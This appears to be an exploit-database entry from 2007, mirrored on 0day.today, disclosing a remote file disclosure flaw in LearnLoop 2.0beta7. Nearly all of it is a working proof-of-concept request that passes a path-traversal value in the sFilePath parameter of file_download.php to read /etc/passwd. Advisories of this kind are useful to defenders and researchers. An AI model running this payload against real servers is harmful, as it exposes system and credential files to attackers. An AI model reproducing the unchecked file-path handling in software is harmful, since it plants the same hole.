id: 2332
date: 11/29/2007
title: LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

===================================================================
LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
===================================================================



LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd



#  0day.today [2023-03-26]  #